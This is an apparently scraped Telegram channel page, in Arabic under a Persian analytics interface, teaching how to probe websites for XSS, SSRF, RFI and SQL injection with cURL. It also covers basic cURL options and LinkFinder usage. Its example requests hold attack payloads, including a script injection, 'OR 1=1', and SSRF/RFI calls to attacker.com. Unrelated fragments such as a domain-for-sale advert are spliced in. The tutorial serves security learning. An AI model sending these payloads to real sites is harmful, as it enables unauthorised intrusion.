Arise Security 2
إشعار إخلاء المسؤولية: يرجى ملاحظة أن المعلومات الواردة في هذه القناة هي لأغراض تعليمية وترفيهية تم إجراء كل محاولة لتقديم معلومات دقيقة ومحدثة وموثوقة وكاملة مزيد من المعلومات التي نقدمها : [Blue24Bluer](https://blue24bluer.netlify.app) @Blue24Bluer
نمایش بیشتر- مشترکین
- پوشش پست
- ER - نسبت تعامل
در حال بارگیری داده...
در حال بارگیری داده...
curl -X GET 'https://example.com/page.php?param=<script>alert("XSS")</script>'
تستبدل https://example.com/page.php?param=<script>alert("XSS")</script> بعنوان URL لصفحة الويب المستهدفة وتتضمن سلسلة نصية تحتوي على جزء البرمجة النصيّة <script>alert("XSS")</script>.
2. SSRF (Server-Side Request Forgery)
ثغرة SSRF تسمح للمهاجم بإجبار الخادم على إجراء طلبات إلى موارد أخرى على الشبكة بدلاً من المصادر المتوقعة. يمكن استخدامها للوصول غير المصرح به إلى موارد أو أنظمة داخلية.
طريقة فحص SSRF باستخدام cURL:
يمكن استخدام cURL لإرسال طلب GET أو POST مع تعيين معلمة URL المستهدفة إلى عنوان URL مشبوه. على سبيل المثال:
curl -X GET 'https://example.com/page.php?url=http://attacker.com/malicious'
تستبدل https://example.com/page.php?url=http://attacker.com/malicious بعنوان URL لصفحة الويب المستهدفة وتتضمن المعلمة url التي تقوم بإرسال الطلب إلى عنوان URL المشبوه http://attacker.com/malicious.
3. RFI (Remote File Inclusion)
ثغرة RFI تسمح للمهاجم بتضمين وتنفيذ ملفات عن بُعد داخل تطبيق ويب. يمكن استغلالها لاستدعاء ملفات خارجية وتنفيذها على الخادم.
طريقة فحص RFI باستخدام cURL:
يمكن استخدام cURL لإرسال طلب GET أو POST لاستدعاء الملف عن بُعد. على سبيل المثال:
curl -X GET 'https://example.com/page.php?file=https://attacker.com/malicious.php'
تستبدل https://example.com/page.php?file=https://attacker.com/malicious.php بعنوان URL لصفحة الويب المستهدفة وتتضمن المعلمة "file" التي تحتوي على العنوان URL المشبوه "https://attacker.com/malicious.php".
ثغرة SQLi (SQL Injection) هي ثغرة أمنية شائعة تسمح للمهاجم بحقن أوامر SQL ضارة داخل إدخالات التطبيقات التفاعلية لقواعد البيانات. يعتبر SQLi خطيرًا لأنه يمكن أن يؤدي إلى استخراج معلومات حساسة من قواعد البيانات أو تعديلها أو حذفها.
طريقة فحص SQLi باستخدام cURL:
عند استخدام cURL لفحص ثغرة SQLi، يمكنك تضمين أوامر SQL ضارة كقيم للمعلمات. على سبيل المثال:
curl -X GET 'https://example.com/page.php?id=1%20OR%201=1'
تستبدل https://example.com/page.php?id=1%20OR%201=1 بعنوان URL لصفحة الويب المستهدفة وتتضمن المعلمة "id" وقيمة مشبوهة مثل 1 OR 1=1.
في هذا المثال، يتم إضافة الجزء 1 OR 1=1 إلى المعلمة "id"، وهذا يعد استفسارًا SQL غير آمن. إذا كان التطبيق معرضًا لثغرة SQLi، فقد يؤدي ذلك إلى عرض جميع السجلات في جدول قاعدة البيانات بدلاً من تحديد سجل واحد فقط.Attacker.com is now for sale, lease or rent. Smart domain names compound conversion rates and this domain name for Attacker marketing is a wise investment.
curl -X GET https://example.com
إرسال طلب POST: يمكنك استخدام cURL لإرسال طلب POST وإرسال بيانات محددة إلى الخادم. يمكنك استخدام الخيار -X POST مع cURL وتحديد البيانات المطلوبة باستخدام الخيار -d أو --data.
مثال:
Copy
curl -X POST -d "username=admin&password=123456" https://example.com/login
التحميل والتنزيل: يمكنك استخدام cURL لتحميل الملفات من الإنترنت أو تنزيلها إلى جهازك. يمكنك استخدام الخيار -o أو --output لتحديد اسم الملف المستهدف.
مثال:
curl -o file.zip https://example.com/file.zip
إرسال رأس الطلب: يمكنك استخدام cURL لإرسال رأس الطلب (HTTP headers) مع طلبك. يمكنك استخدام الخيار -H أو --header لتحديد رأس الطلب.
مثال:
curl -H "Authorization: Bearer token123" https://example.com/api
محاكاة المتصفح: يمكنك استخدام cURL لمحاكاة سلوك المتصفح وإرسال طلبات مشابهة لتلك التي يقوم المتصفح بإرسالها. يمكنك استخدام الخيار -A أو --user-agent لتحديد سلسلة User-Agent.
مثال:
curl -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" https://example.com
إشعار إخلاء المسؤولية: يرجى ملاحظة أن المعلومات الواردة في هذه القناة هي لأغراض تعليمية وترفيهية تم إجراء كل محاولة لتقديم معلومات دقيقة ومحدثة وموثوقة وكاملة مزيد من المعلومات التي نقدمها : [Blue24Bluer](
https://blue24bluer.netlify.app)@Blue24Bluer
python linkfinder.py -i https://example.com/1.js -o results.html
2. لاكتشاف نقاط النهاية في ملف JavaScript عبر الإنترنت وطباعة النتائج على سطر الأوامر (STDOUT):
python linkfinder.py -i https://example.com/1.js -o cli
3. لتحليل مجموعة كاملة من ملفات JavaScript في مجال معينA python script that finds endpoints in JavaScript files - GerbenJavado/LinkFinder
- A
- B
طرح فعلی شما تنها برای 5 کانال تجزیه و تحلیل را مجاز می کند. برای بیشتر، لطفا یک طرح دیگر انتخاب کنید.